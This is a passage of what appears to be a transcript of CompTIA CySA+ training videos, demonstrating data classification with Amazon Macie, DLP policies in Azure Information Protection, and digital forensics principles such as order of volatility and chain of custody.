In the enterprise, we know that data classification is important. It's important because if we don't know what
kinds of data we have, and if they're not classified. It becomes very cumbersome to try to protect specific types
of data. So if for regulatory compliance we have to protect product data, or financial data, or medical data. If
we don't know what we have that's medical, product, or financial. How are we going to properly protect it in
accordance with laws and regulations? So we can enable data classification mechanisms in cloud
environments. Specifically in our example in Amazon Web Services or AWS using a service called Macie, M-
A-C-I-E.
[Video description begins] A web page labeled "AWS Management Console" opens. It includes a search box
labeled "Find Services" in a section labeled "AWS services". [Video description ends]
I'm going to search for macie and we're going to click on Amazon Macie here. The first thing we're going to
have to do is enable this feature in the cloud. So I'm going to go ahead and click the Get started button.
[Video description begins] He types mac in the Find Services search box and its search result includes a link
labeled "Amazon Macie". He clicks the Amazon Macie link and its corresponding web page opens. It includes
a button labeled "Get Started". [Video description ends]
It's going to apply to the selected region geographically here where I've got data stored, in this case, US East,
(N. Virginia). I can change that up if I so choose. That's where the bulk of my data is stored so I'm going to
leave it there.
[Video description begins] The Enable Amazon Macie page opens. It includes a drop-down list labeled
"Region" in which US East (N. Virginia) is set by default. Then he points to a drop-down list in which US East
(N. Virginia) region is selected. [Video description ends]
We can also view service role permissions. There's a built-in identity and access management role here that
requires specific permissions to be able to look at data. Such as data stored in an S3 bucket.
[Video description begins] He clicks a button labeled "View service role permissions" and a window labeled
"Macie service role permissions" opens. It includes tabs labeled "Permissions" and "Trust relationships". The
Permissions tab is selected by default. It displays a set of code in Read-only mode. [Video description ends]
Now, in Amazon Web Services an S3 bucket is a cloud storage location. And that's what we want Macie to
examine, to look for sensitive data and classify it as such.
[Video description begins] He closes the Macie service role permissions window. [Video description ends]
So I'm going to click Enable Macie in the bottom-right. That's going to take me to an Amazon Macie
configuration page.
[Video description begins] A web page labeled "Amazon Macie" opens. It is divided into three parts: menu
bar, navigation pane, and content pane. The navigation pane includes options labeled "DASHBOARD" and
"SETTINGS". The DASHBOARD option is selected and its corresponding content is displayed in the content
pane. It includes four tiles labeled "Critical assets", "Total event occurrences", "Total user sessions", and
"Total users (0)". [Video description ends]
Here on the main Amazon Macie page, we're looking at a DASHBOARD of assets that are discovered that are
critical. Any suspicious event occurrences. However, what I want to do is go down to SETTINGS on the left.
Here, we can take a look at how data will be classified.
[Video description begins] He clicks the SETTINGS option in the navigation pane and its corresponding blade
opens. It includes an icon labeled "Theme". [Video description ends]
For example, if I click on Theme, here I can see, Attorney Client Privileged, that could be important. Banking
Keywords or Credit Card Keywords. If I click on Credit Card Keywords, it's going to look for checkcard,
debitcard, check card, debit card with spaces, cardholder and so on.
[Video description begins] The page labeled "Themes" opens. It includes a table with four columns and
multiple rows. The column headers are Theme title, Minimum keyword combinations, Risk, and Enabled. He
points to row entries under the Theme title column header. A page labeled "Edit theme details" opens. He
points to an information labeled "Training set keywords". [Video description ends]
Well, that's interesting. So we can edit these theme details to make changes. So I'm just going to CANCEL
here. What's going to happen if it discovers that is it's going to classify the data. And also we have a risk
associated with it, a risk value. If we were to go into our SETTINGS again and choose Content type. Again,
here we could search for specific types of files and how they would be classified.
[Video description begins] In the SETTINGS page, he clicks an icon labeled "Content type" and its
corresponding page opens. It includes a table with five columns and multiple rows. The column headers are
Name, Description, Classification, Risk, and Enabled. [Video description ends]
[Video description begins] He points to Adobe Application Manager and Binary row entries under the
Description and Classification column headers respectively. [Video description ends]
Now, I can click on INTEGRATIONS on the left because I need to link these settings in Amazon Macie with
S3 storage buckets. So here's my Amazon Web Services Account ID. I'll click SELECT over on the right. And
I need to add some S3 buckets.
[Video description begins] He clicks an option labeled "INTEGRATIONS" in the navigation and its
corresponding page opens in the content pane. It includes a tab labeled "S3 RESOURCES" which further
includes an Account ID. He points to the Account ID labeled "611279832722". Then he clicks a button labeled
"SELECT". A section labeled "Integrate S3 resources with Macie" appears which includes buttons labeled
"ADD" and "EDIT". [Video description ends]
So I'll click ADD and I'm going to scroll down. I'm going to choose a bucket where I know I've got some
content here.
[Video description begins] A section labeled "Add S3 resources to Macie" displays. It includes a table with
four columns and multiple rows. The column headers are S3 resources, Total objects, Processed estimate, and
Cost estimate. Each row has a checkbox adjacent to it. He selects a checkbox adjacent to a bucketyyz row
entry under the S3 resources. [Video description ends]
So I'll put a check mark next to it. And up above, I'm going to go ahead and click ADD. Okay, so our bucket is
listed over here. It's called bucketyyz. And I'll click REVIEW and START CLASSIFICATION.
[Video description begins] A dialog box labeled "Configure classification methods for your new and existing
S3 objects. Learn more" opens. It includes information about classification of new and existing objects. He
clicks a button labeled "Review". The dialog box displays an information about Number of S3 resources
selected: 1, Total size: 15MB, Total number of objects: 118, Processed estimate: 15 MB, Classification of new
objects type: Full, Classification of existing objects type: Full (Total cost estimate: $0). Then he clicks a
button labeled "START CLASSIFICATION". [Video description ends]
It says that settings have been updated. The selected buckets and paths will be protected by Macie. Okay, I'll
click DONE.
[Video description begins] The Configure classification methods for your new and existing S3 objects. Learn
more dialog box closes. The S3 RESOURCES tab displays in which a new row adds in the table. The row
entries under the Selected S3 resources, New objects, Existing objects are bucketyyz/, Full, and Full
respectively. [Video description ends]
So far, so good. Now, what I need to do is give it a chance to start taking a look at what's stored in the bucket
to determine how will classify any data. After a few minutes on the Amazon Macie DASHBOARD, if I scroll
down a little bit, here I've got my S3 objects for selected time range selected. We can see we have a little bit of
a graph for all the data and the time ranges, that was detected.
[Video description begins] He opens the DASHBOARD page. Then he points to an icon labeled "S3 objects for
selected time range". The DASHBOARD also includes a pie chart which represents All Data, Range: 0-6
months ago, Range: beyond 6 months ago, encryption_key, and json/other entities with different colors. [Video
description ends]
Now we could double-click for example for all of the data in S3 where we can see all of the matched results, of
course plotted across dates.
[Video description begins] He clicks All Data and two bar graphs display. The x-axis represents values and
the y-axis represents months in the first graph. The second graph displays x-axis which represents
months. [Video description ends]
Now, as I scroll down below, I can see the summary listed down below.
[Video description begins] He scrolls down to a section labeled "Search results summary". It includes a table
with two columns and multiple rows. The column headers are Field and (Top 10/Bottom 10). [Video
description ends]
So for example, Object PII priority and Object language codes, risk levels 5 or 6. So if I were to, for example,
double-click on that, I can start to see some of the details listed for that. I can even export it as a CSV type of
file or as a PNG visual file.
[Video description begins] He double-clicks 5 6 row entry under the (Top 10/Bottom 10) column header. An
information box opens which displays percentage bar for 5 and 6. The 5's percentage bar sets to 96.15%(25)
and the 6's percentage bar sets to 3.84% (1). The information box also includes two icons labeled "export as
csv" and "export as png". He points to the icons. [Video description ends]
I can click the little icon next to the magnifying glass to read the details about exactly what it's referring to in
terms of risk. And I can go down and start to see some file names that were inventoried and discovered in that
S3 bucket.
[Video description begins] He clicks a search icon adjacent to the 5's percentage bar and a table with five
columns and multiple rows displays. The column headers are Date, Type, User, Description, and Risk. The
table displays a search result of the Object risk level 5. [Video description ends]
So we have a number of ways that we can do that. Let's go back to the DASHBOARD. And we can also view
it by S3 objects.
[Video description begins] He opens the DASHBOARD page. Then he clicks an icon labeled "S3 objects". It
displays four percentage bars labeled "email/all", "json/other", "Credit Card Keywords", and
"encryption_key". Their respective percentage values are 49.05% (26), 47.16% (25), 1.88% (1), and 1.88%
(1). [Video description ends]
So for example, I can see how the data has been started to be classified, e-mail, and looks like we have
something for Credit Card Keywords. So we can see a percentile listing there for some of those items that were
discovered. And we can click the magnifying glass to the left to find out exactly which items stored in the
cloud relate to credit card data. We can see it looks like we've got a file that was called CardData.
[Video description begins] He clicks a search icon adjacent to the Credit Card percentage bar and the Search
results summary section displays. It includes a table with five columns and a row. The column headers are
Date, Type, User, Description, and Risk. [Video description ends]
So if I click on that link, it'll give me some more details about that selected item. So when it was last modified,
the bucket that it's stored in.
[Video description begins] He clicks a CardData.txt row entry under the Description column header. A table
with two columns and multiple rows displays. The column headers are Field and Value. [Video description
ends]
And we can also see that we have some other details listed here. Such as the Object risk level, and anything
else in terms of metadata tied to that specific item. So we could open up a new web browser window. I'm just
going to duplicate what we're looking at here. And maybe we'll just go back to the main Amazon Web Services
page.
[Video description begins] He opens the AWS Management Console. Then he types S3 in the Find Services
search box and its result includes a link labeled "S3". He clicks the S3 link and its corresponding web page
labeled "S3 Management Console" opens. It is divided into three parts: menu bar, navigation pane, and
content pane. The navigation pane includes an option labeled "Buckets" and its corresponding blade is open
in the content pane. It include a table with four columns and multiple rows. The column headers are Bucket
name, Access, Region, and Date created. [Video description ends]
Now here on the management console page, if we were to go into the S3 bucket and take a peek. So we're
looking for a bucket by the name of bucketyyz. So if I kind of click on that to open it up, there's the CardData
file. And we can actually open it up. It's just a text file. So it's going to open right here in the browser.
[Video description begins] He double-clicks a bucketyyz row entry under the Bucket name column header and
its corresponding blade opens. It includes tabs labeled "Overview", "Properties", and "Permissions". The
Overview tab is selected. It includes a table with four columns and multiple rows. The column headers are
Name, Last modified, Size, and Storage class. Then he clicks a CreditData.txt row entry under the Name
column header and its corresponding blade opens. It includes tabs labeled "Overview", "Properties", and
"Permissions". The Overview tab is selected. It includes a button labeled "Open" and information about
Owner, Last modified, Etag, Storage class, Server-side encryption, and Size. He clicks the Open button and
the CreditData.txt file opens in the browser. [Video description ends]
And we can see indeed it does have some debit card numbers. And so that's why Macie was able to discover
that and classify it as sensitive data. Now while you're going through the DASHBOARD. The other thing that
you're going to notice is that it's generating some queries as you start clicking on items down below. So if I
start clicking on things, there's a query up at the top.
[Video description begins] He switches to the Amazon Macie Console. Then he opens the DASHBOARD page.
Then he clicks the S3 objects for selected time range icon and its corresponding pie chart displays. He clicks
the All data entity in the pie chart. [Video description ends]
However, you can also type in your own queries looking for strings or dates and times, whatever the case
might be.
[Video description begins] He clicks at the center of the pie chart which represents All data entity and its
displays a query box which includes the following query: themes AND dlp_risk[5 TO *] AND @timestamp.*.
It also displays a bar graph. The x-axis represents values and the y-axis represents months in the first graph.
The second graph displays x-axis which represents week days. [Video description ends]
So we can remove all of these items and even type in our own query if we know what we're looking for. For
example, I'm going to put here a filesystem_metadata.bucket. And I've got bucketyyz referred to here along
with the PII impact of moderate or a PII impact of high. So, if we do a search over a specific time range, here
it's all time, then we'll get our listed results shown here. We can wait for the summary to be rendered down at
the bottom.
[Video description begins] He pastes the following query in the query box:
filesystem_metadata.bucket:"bucketyyz" AND (pii_impact:"moderate" OR pii_impact:"high"). Then he clicks
a search icon and a bar graph displays. It also displays a table in the Search result summary section. [Video
description ends]
So you can also query this stuff depending on what your needs are.
In this video, you will learn when to use DLP solutions for data privacy.
Objectives
[Video description begins] Topic title: Data Loss Prevention. The presenter is Dan Lachance. [Video
description ends]
Data Loss Prevention or DLP is an important aspect of IT security, where the security technician needs to
ensure that sensitive data isn't disclosed to unauthorized parties. According to Wikipedia, the term data breach
can be defined as being the intentional or unintentional release of secure or private and confidential
information to an untrusted environment. Notice that the words intentional and unintentional are listed here.
We don't have to only think about malicious users, but we have to think about mistakes that might be made by
internal employees that could result in data breaches.
So DLP then is related to user awareness and training, specifically the success of a DLP program. Users need
to be aware of social engineering scams that can be used to infect machines or trick people into disclosing
sensitive information directly. During new employee onboarding, so for new hires, there should be user
awareness and security training that is part of that. Of course, that should be a continual process, for example,
annually, even for existing employees as security threats change over time. So periodic training updates is a
big deal on the latest scams. Such as, tax department phone calls, trying to scare people into wiring money, or
sending e-transfers because they have money owing, otherwise they'll be thrown in jail. People need to know,
that is not how things work with tax departments. So it's all about knowledge and awareness.
Now, there's also the technical side to data loss prevention for the protection of digital rights. That's often
called Digital Rights Management or DRM. So if we've got sensitive data that's being used within the
organization, we then have to think about as we see the bottom right of our diagram, the data loss prevention
policies that we might configure. These would consist of conditions that might be triggered such as someone
sending an email message outside of the organization with the file attachment, and then the actions that might
be taken. Now, those actions might include limited removable media use, in other words, unless the USB
thumb drive is not encrypted, no one's allowed to copy files to it. Or in email programs, we might prevent the
printing of sensitive email messages, or the forwarding of sensitive email messages. And we might prevent file
attachments when sending email outside of the company and limit access to social media content. So a lot of
these are actions that will be triggered based on your DLP policy conditions. So for example, if a mail message
is received that's encrypted and flagged as highly confidential, then there's no way that our policies would
allow that to be printed or forwarded to others.
In this video, you will configure DLP policies with Microsoft Azure.
Objectives
[Video description begins] Topic title: Deploying Cloud-based Data Loss Prevention. The presenter is Dan
Lachance. [Video description ends]
The Microsoft Azure Cloud supports data loss prevention in the form of Azure Information Protection or AIP.
[Video description begins] A web page labeled "Home - Microsoft Azure" opens. It is divided into three parts:
menu bar, navigation pane, and content pane. The menu bar includes a search box and icons. Some of the
icons are Settings, Help, and User. The navigation pane includes options labeled "Home" and "Dashboard".
The Home option is selected by default and its corresponding content is displayed in the content pane. [Video
description ends]
I've signed into the Azure portal so I'm going to search for information. I'm going to choose Azure Information
Protection.
[Video description begins] He types info in the search box and its search result includes a link labeled "Azure
Information Protection". A blade labeled "Azure Information Protection - Labels" opens. It is divided into two
sections: navigation pane and content pane. The navigation pane includes options labeled "General" and
"Classifications". The Classifications option is expanded which contains two sub options labeled "Labels" and
"Policies". The Labels sub option is selected and its corresponding blade is displayed in the content pane. The
content pane includes a table with multiple columns and a row. The column headers include LABEL DISPLAY
NAME and POLICY. A link labeled "Add a new label" row entry is displayed below the table. [Video
description ends]
The first thing I'm going to do is click Add a new label. So this is a sensitivity label, for example. I'm going to
call this Highly Sensitive. We're talking about flagging documents that people might work with in some way to
protect them, that's why I'm creating this.
[Video description begins] A blade labeled "Label" opens. He types Highly Sensitive in a text box labeled
"Label display name". [Video description ends]
I'll specify a description for the Highly Sensitive label. I can also choose colors I want to associate with
different labels, and I'm going to set the document to Protect. I want to protect documents that contain that
label.
[Video description begins] A description displays in a text box labeled "Description". The description is as
follows: Customer or internal sensitive data that should not be shared outside of the organization. The blade
also includes a toggle button labeled "Color". It has two options labeled "Select from list" and "Custom". The
Select from list option is selected. A drop-down box is linked with it. He clicks the drop-down list box and a
drop-down list opens. He selects an option labeled "Orange" from the drop-down list. [Video description ends]
Now as I take a look over here on the right, I can also add permissions. So I'm going to click Add permissions.
So who should be allowed to work with documents using that sensitivity label?
[Video description begins] The blade also includes a toggle button labeled "Set permissions for documents
and emails containing this label". It has three options labeled "Not configured", "Protect", and "Remove
Protection". The Not configured option is selected by default in the Set permissions for documents and emails
containing this label toggle button. He selects the Protect option and its corresponding section labeled
"Protection" opens. Along with this, its corresponding blade labeled "Protection" opens. It includes a toggle
button labeled "Protection settings" which contains two options labeled "Azure (cloud key)" and "HYOK (AD
RMS)". The Azure (cloud key) option is selected by default. It further includes two radio buttons labeled "Set
permissions" and "Set user-defined permissions (Preview)". The Set permissions radio button is selected and
its corresponding table is displayed with two columns and a row. The column headers are USERS and
PERMISSIONS. A link labeled "Add permissions" is displayed below the table. He clicks the Add permissions
link and its corresponding blade labeled "Add permissions" opens. [Video description ends]
So I can browse any users I might have created in my cloud-based Azure Active Directory or AAD. I've got a
user I'm going to search for called Max Bishop that I've already created in Azure Active Directory.
[Video description begins] The Add permissions blade includes a tab labeled "Select from the list" which
includes a link labeled "Browse directory". He clicks the Browse directory link and its corresponding blade
labeled "AAD Users and Groups" opens. It includes a search box and a list of users and groups. Some of the
users and groups are labeled "EastAdmins" and "Max Bishop". [Video description ends]
So I'm going to select Max Bishop. So he's been added to the list of users and down below I have to determine
what he can do.
[Video description begins] He selects the Max Bishop user from the list. Then he clicks a button labeled
"Select" and the AAD Users and Groups blade closes. The Max Bishop user id labeled
"[email protected]" displays under a section labeled "USERS". The Add permissions blade also
includes a toggle button labeled "Choose permissions from preset or set custom". It has five options labeled
"Co-Owner", "Co-Author", "Reviewer", "Viewer", and "Custom". The Co-Owner option is selected and its
corresponding list of permissions is displayed which includes permissions labeled "View, Open, Read (VIEW)"
and "Save (EDIT)". [Video description ends]
Is he only a Viewer or is he a Co-author to the document, or do I want to select custom permissions for that
account? I'm going to choose Co-owner and then click OK.
[Video description begins] He selects the options one by one and their corresponding permissions display one
by one under a section labeled "PERMISSIONS". He keeps the default, Co-Owner option selected and closes
the Add permissions blade. [Video description ends]
Down below for allow offline access, I'm going to choose Never, and then I'll click OK. So they must be
connected to the network to work with that document. So that's the Microsoft Azure cloud key protection
configuration.
[Video description begins] The Protection blade also includes a toggle button labeled "Allow offline access".
It has three options labeled "Always", "Never", and "By days". The By days option is selected. He selects the
Never option and closes the Protection blade. [Video description ends]
I'm also going to turn on a watermark here that I want in the background of the document.
[Video description begins] The Label blade also includes a toggle button labeled "Documents with this label
have a watermark". It has two options labeled "Off" and "On". The Off option is selected by default. He selects
the On option and a text box labeled "Watermark text" displays. He types Property Of Lachance IT in the
Watermark text text box. [Video description ends]
It's going to say Property Of Lachance IT, and then I'm going to click a new condition here. Basically, I can
choose an industry flag that would be applied here, let's say, for credit card numbers, and I can save that
configuration.
[Video description begins] The Label blade also includes a section labeled "Configure conditions for
automatically applying this label". It includes a link labeled "Add a new condition". He clicks the new
condition link and its corresponding blade labeled "Condition" opens. It includes a toggle button labeled
"Choose an industry". It has four options labeled "All", "Financial", "Medical and Health", and "Privacy".
The All option is selected by default. He selects the Financial option and its corresponding industry names
displays under a section labeled "NAME". Some of the industry names are labeled "Credit Card Number" and
"EU Debit Card Number". He selects a checkbox adjacent to the Credit Card Number. [Video description
ends]
Okay, so we've got a new condition that will determine if highly sensitive is applied to documents, if it looks
like it's got credit card info. So I'm going to Save that label information. So I've defined a label called highly
sensitive.
[Video description begins] He clicks an icon labeled "Save". A dialog box labeled "Save settings" opens. It
includes a button labeled "OK". He clicks the OK button and the Condition blade closes. In the Label blade, a
new row adds in the table displayed in the Configure conditions for automatically applying this label section.
The row entries under the CONDITION NAME and OCCURRENCES are Credit Card Number and 1
respectively. Then he clicks an icon labeled "Save" and the Label blade closes. A new row entry adds in the
table displayed in the Labels blade. A Highly Sensitive row entry displays under the LABEL DISPLAY NAME
column header. There is no row entry under the POLICY column header. A check mark is displayed under the
MARKINGS and PROTECTION column headers. [Video description ends]
Now I haven't assigned it yet to a policy. There's nothing in the policy column. So I'm going to click Policies
here in Azure Information Protection, and I'm going to create a new policy. You add labels to policy. So this
policy, I'm simply going to call Policy 1.
[Video description begins] He clicks the Policies option in the navigation pane and its corresponding blade
opens in the content pane. It includes a link labeled "Add a new policy". He clicks the Add a new policy link
and its corresponding blade labeled "Policy" opens. It includes a section labeled "Configure administrative
name, description and scope for this policy" which further includes a text box labeled "Policy Name". He types
Policy 1 in the Policy Name text box. [Video description ends]
Down below, I have to select the users or groups that will get the policy. So I'm going to go ahead and browse
over here on the right until I find user Max Bishop. So I'm going to go ahead and select him and I'll click OK.
[Video description begins] The blade also includes a section labeled "Select which users or groups get this
policy. Groups must be email-enabled". He clicks this section and its corresponding blade labeled "AAD
Users and Groups" opens. It includes a section labeled Users/Groups. He clicks the Users/Groups section and
its corresponding blade labeled "AAD Users and Groups" opens. It includes a search box and a section of
which will display a list of users and groups. He types max in the search box and a user labeled "Max Bishop"
displays. He selects that user and clicks a button labeled "Select". The AAD Users and Groups blade closes.
The Max Bishop user with the email id labeled "[email protected]" displays under the Users/Groups
section. [Video description ends]
Then I'll click Add or remove labels for this policy. We already have one label that we've created called Highly
Sensitive. So there it is in the list.
[Video description begins] He clicks the OK button and the AAD Users and Groups blade closes. The Max
Bishop user name adds in the Select which users or groups get this policy. Groups must be email-enabled.
section in the Policy blade. The Policy blade also includes a link labeled "Add or remove labels". [Video
description ends]
I'm going to select that and I'm going to click OK. So it's been added to the policy here.
[Video description begins] He clicks the Add or remove labels link and its corresponding blade labeled
"Policy: Add or remove labels" opens. It includes a table with two columns and a row. The column headers
are LABEL DISPLAY NAME and POLICY. The row entry under the LABEL DISPLAY NAME column header
is Highly Sensitive. The row entry under the POLICY column header is not displayed. He selects a checkbox
adjacent to the Highly Sensitive row entry. Then he clicks a button labeled "OK" and the Policy: Add or
remove labels blade closes. In the Policy blade, a new row adds in the table. The column headers are LABEL
DISPLAY NAME, POLICY, MARKING, and PROTECTION. The respective row entries under the LABEL
DISPLAY NAME and POLICY are Highly Sensitive and Policy 1. A check mark is displayed under the
MARKING and PROTECTION column headers. [Video description ends]
So as I scroll down, I have a number of other settings here, such as selecting a default if I wish.
[Video description begins] He clicks a drop-down list box labeled "Select the default label". A drop-down list
opens which contains two options labeled "None" and "Highly Sensitive". The None option is selected by
default. He selects the "Highly Sensitive" option. [Video description ends]
So if the user doesn't select anything, everything will be treated as highly sensitive by default. So I'm going to
Save this policy. So we've got a custom label added to a custom POLICY called Policy 1.
[Video description begins] He selects an option labeled "On" for a toggle button labeled "All documents and
emails must have a label (applied automatically or by users)". He clicks the Save button and the Policy blade
closes. A row entry adds below the POLICY column header that is Policy 1. [Video description ends]
Now the next thing I have to do is download and install the Azure Information Protection client for the
appropriate device platform. Such as for Windows.
[Video description begins] He opens a web page labeled "Microsoft Azure Information Protection". [Video
description ends]
This is what integrates with products like Microsoft Word, which I've got open here. Notice that Highly
Sensitive is shown here as a sensitivity label by default. I can go up to the Protect button in the toolbar, and I
can see some of my sensitivity labels.
[Video description begins] He opens an empty word document which includes a label "Highly Sensitive". He
clicks a menu labeled "Protect" in the ribbon. A flyout opens which includes options labeled "Highly
Sensitive" and "Show Bar". [Video description ends]
So back here in the Azure portal, let's just take a quick peek here at the Azure Information Protection
configuration. Indeed, we're going to see that Highly Sensitive is our label and it was assigned to Policy 1.
[Video description begins] He switches to the Home - Microsoft Azure web page. Then he types info in the
search box and clicks the Azure Information Protection from the search result. The Azure information
Protection - Labels blade opens. The table displayed in the content pane displays Highly Sensitive and Policy
1 row entries under the LABEL DISPLAY and NAME POLICY column headers. He points to these row entries.
Then he opens the Policies blade and its corresponding table displays. He points to the Policy 1 row entry
under the POLICY column header. [Video description ends]
Let's go to the policies view, there's Policy 1. And so when we open up Policy 1, this is where we'll see that it
was assigned to Max Bishop. And that the label display here added to the policy is Highly Sensitive.
[Video description begins] He clicks the Policy 1 row entry and its corresponding blade labeled "Policy:
Policy 1" opens. [Video description ends]
And we can see our configuration here. Highly Sensitive is the default label, that's why it shows up with a
brand new document in Microsoft Word. And we're displaying the Protection bar, the icon, in Microsoft Office
apps. That's why we see that icon listed here at the top center.
[Video description begins] He switches to the word document. [Video description ends]
So I'm going to go ahead and type something in and then start to work with this document. And what's going to
happen when I save this is that it tells me it's highly sensitive and I've also got the custom watermark shown in
the background. So when I view the permissions, I can see the permissions assigned in this case to user
MBishop.
[Video description begins] He types This is a sample document. Then he saves the word document. An
information bar displays with a button labeled "View Permission..." and a Lachance IT watermark displays in
the background of the word document. He clicks the View Permission... button and a dialog box labeled "My
Permission" opens. He closes the My Permission dialog box. [Video description ends]
Objectives
[Video description begins] Topic title: Course Summary. [Video description ends]
So in this course we've examined data privacy standards and regulations for protecting Sensitive Personal
Information. And we talked about what an organization can do to ensure data privacy regulatory compliance.
We did this by exploring examples of PII and PHI. We looked at the role that regulatory compliance plays in
the design and development of organizational security policies. We talked about how HIPAA protects sensitive
medical information. How GDPR assures data privacy for European Union citizen data. And also, we talked
about the purpose of PCI DSS for cardholder merchants. Then we talked about how to configure server-based
data classification using Windows Server File Server Resource Manager. We looked at how to configure
cloud-based data classification using Amazon Web Services Macie. Talked about when data loss prevention or
DLP solutions should be used for data privacy. And finally, we talked about how to use Microsoft Azure to
configure DLP policies. In our next course, we'll move on to explore the use of digital forensics for the
gathering and handling of digital evidence. Including forensics hardware and software solutions.
Table of Contents
Objectives
[Video description begins] Topic title: Course Overview. Your host for this session is Dan Lachance, an IT
Trainer / Consultant. [Video description ends]
Hi, I'm Dan Lachance. I've worked in various IT roles since the early 1990s, including as a technical trainer, as
a programmer, a consultant, as well as an IT tech author, and editor. I've held and still hold IT certifications
related to Linux, Novell, Lotus, CompTIA and Microsoft. Some of my specialties, over the years have
included networking, IT security, Cloud Solutions, Linux management and configuration, and troubleshooting
across a wide array of Microsoft products. The CS0-002 CompTIA Cybersecurity Analyst or CySA+
certification exam is designed for IT professionals looking to gain security analyst skills to perform data
analysis, to identify vulnerabilities, threats, and risks to an organization. To configure and use threat detection
tools, and secure and protect an organization's applications and systems.
In this course, we're going to explore how digital forensics helps ensure the proper collection and handling of
digital evidence. As well as looking at some common digital forensics hardware and software solutions. I'll
start by examining the purpose of digital forensics and the importance of the chain of custody, proper evidence
gathering and handling. I'll then explore some of the common digital forensics hardware and software solutions
and show how to acquire a hard disk image using the Linux DD command. Next, I'll demonstrate how to
enable legal hold for an Amazon Web Services S3 bucket. And lastly, I'll show how to restore deleted files on
both the Linux and Windows platforms.
2. Video: Digital Evidence Gathering (it_cscysa20_13_enus_02)
Upon completion of this video, you will be able to describe the purpose of digital forensics.
Objectives
[Video description begins] Topic title: Digital Evidence Gathering. The presenter is Dan Lachance. [Video
description ends]
If you've ever been involved in the gathering of digital evidence that might be related to a crime, so therefore
the admissibility in a court of law is relevant, then you might have experience with digital forensics.
Digital forensics is defined as the application of computer science and data recovery to the law. And so very
specific techniques must be employed to ensure proper governance of any acquired digital evidence. And also
to make sure that it's not been tampered with. So if this is potential legal evidence, the stakes are high because
it needs to be made admissible in a court of law. The digital forensics process starts with gathering of evidence.
[Video description begins] The Digital Forensics Process [Video description ends]
Whether that's making sure you acquire a cell phone from a potential suspect, or storage devices, or keep a
machine running once a location has been raided, anything along those lines. Next, analysis of that acquired
data. Now if we're talking about a storage device, for example, we want to make sure that we analyze a copy of
that data, never the original. And so part of digital forensics is making a digitally forensic sound copy of data
that is admissible in a court of law. And generating things like file system hashes on the original data, as well
as the analyzed data, so that we can determine whether or not changes have been made. Because there's always
the possibility of tampering with evidence. Then there's ultimately the reporting of conclusions that were
drawn by the investigators based on the analysis of digital data. This also means reporting which tools and
techniques were used and a way to prove that the sensitivity of the data and the protection of it while it was
stored was preserved.
Digital forensics results seek to answer questions such as what happened, when did it happen, and who was
involved with it happening? Now, the who was involved part can be difficult as all of these key points can be
such as determining who was at a computer when some kind of alleged crime took place. Just because it came
from a person's computer or IP address does not necessarily tie that person to being the one that executed or
perpetrated that crime. Of course additional evidence, like surveillance video and so on, could help to prove
that and solidify that evidence.
Then we have to consider the order of volatility. Some computer components and activities are more sensitive
than others. And we want to make sure that we gather or copy the most sensitive items first. So it's about
evidence gathering, and also can deal with the dependency on electricity. Starting with CPU registers and
cache, the central processing unit or the brain of the computer is very sensitive. It's got limited amounts of
memory for its cache and so it can be overwritten often. So that would be the first thing that we would want to
use our tools against to acquire data. Next would be memory contents. Now, that requires electricity. But
again, there's a limited amount of memory. We don't want it to be overwritten and lose something that
potentially could have served as incriminating evidence. Then there's temporary file systems on machines and
non-volatile storage such as permanent storage. That would be the last thing you would acquire data from.
Because even if the power goes out on a device or a battery fails, you don't have to worry about it. The data is
still retained because it's persistent. Now, there's so much that can be learned by looking at something like
memory contents. That might include things like drive mappings to other network locations, routing table
entries, DNS client resolver information, and so on.
Evidence gathering is the responsibility of digital forensic technicians. And in some cases, that might be the
first responders when it comes to digital or cybersecurity incidents. It's important to always work from a copy
of the digital data. And we do that by imaging or cloning source storage devices. We can even enable write-
blocking to prevent changes to the original source data. Write-blocking can be in the form of a hardware
device, can also be a software component that prevents writing back to the original source data. Some
examples of gathering evidence would include, immediately turning off a suspect mobile phone and removing
batteries.
Now, depending on what it is that you're trying to gather, you want to be careful with this. If the primary
purpose here is to make sure that nothing can be sent from the phone or to it, then this might be acceptable. But
at the same time, we want to make sure that if needed, we capture a copy of the memory contents of that
mobile device before it's powered off. So the exact actions that are taken will depend on the specific
circumstances. You might use a faraday bag around a device. A faraday bag essentially shields it so that
wireless transmissions are no longer possible. Such as a remote malicious user trying to send a command to
wipe sensitive data or incriminating data.
We might even go old school and take photographs of equipment and computer screens very quickly in case
power goes out. A lot of malicious users will set trip wires on computing equipment if they know they're
performing illegal activity. So that if a device is plugged into a USB port to gather forensic data, that might
trigger the machine to destroy itself or wipe data. So we have to be aware of this. Another important aspect of
digital forensic evidence gathering might be to look at scanner or printer document history. Or even something
as simple as seeing the last physical paper document that was scanned in a scanning device. Another example
would be acquiring security camera footage. So that we might be able to put someone at a specific location at a
certain time, which could be used as evidence in a court of law.
[Video description begins] Topic title: Chain of Custody. The presenter is Dan Lachance. [Video description
ends]
The chain of custody is relevant to digital forensics but it's not exclusive to digital forensics. When we talk
about chain of custody, we are talking about exactly how evidence is gathered at a scene. How the evidence is
stored. So the location and having a log of who has access to it. And all of these items together comprise the
chain of custody. There is a lot of weight placed on adhering to proper chain of custody rules for evidence
admissibility in a court of law. So, this is very important but at the same time, the laws that govern this will
really vary from one region of the world to another. So it's important as a cybersecurity analyst to be well-
versed in how chain of custody rules work in a specific region. Evidence storage is always important, such as
the acquisition of storage devices, or smartphones, or routers, or disk arrays.
One aspect is to use antistatic bags. In other words, to protect the data from static electricity that might be
stored on a removable device. Using detailed labeling on devices for tracking and auditing purposes. Having
an evidence access log. So evidence might be stored in a secured facility somewhere for a period of time, but
who had access to it? Climate-controlled storage rooms are especially important for digital equipment. To
make sure that the equipment can be started in the future if needed, or that data can be pulled off of storage
devices in the future. We also have to think about the internal batteries, which are used to retain things like the
date and time for long-term stored items like laptop computers. So that is going to be something to consider.
When working with the acquisition and subsequent storage of digital evidence.
[Video description begins] Sample Chain of Custody Form [Video description ends]
It's important that the chain of custody be adhered to. And here's an example of a sample form. Where we can
see at the top-left, things must be filled in. Such as the case number, the offense type, the first responder ID,
the suspect ID, date and time, location. And then down below, for each piece of evidence we would have a
label number, a date and time of when it was exactly gathered. Having a release and a receive ID when it
comes to stored evidence that might be checked out by investigators for example. And then also a location and
comments field. This is just an example of what types of things need to be logged with chain of custody. But
remember it will vary from one region to another.
[Video description begins] Topic title: Digital Forensics Hardware. The presenter is Dan Lachance. [Video
description ends]
The acquisition of digital evidence requires not only the possession of the right equipment, but the knowledge
of how to use it correctly, in accordance with rules related to the chain of custody. So law enforcement and
private investigation firms will have digital forensics analysts that have a specific dedicated digital forensics
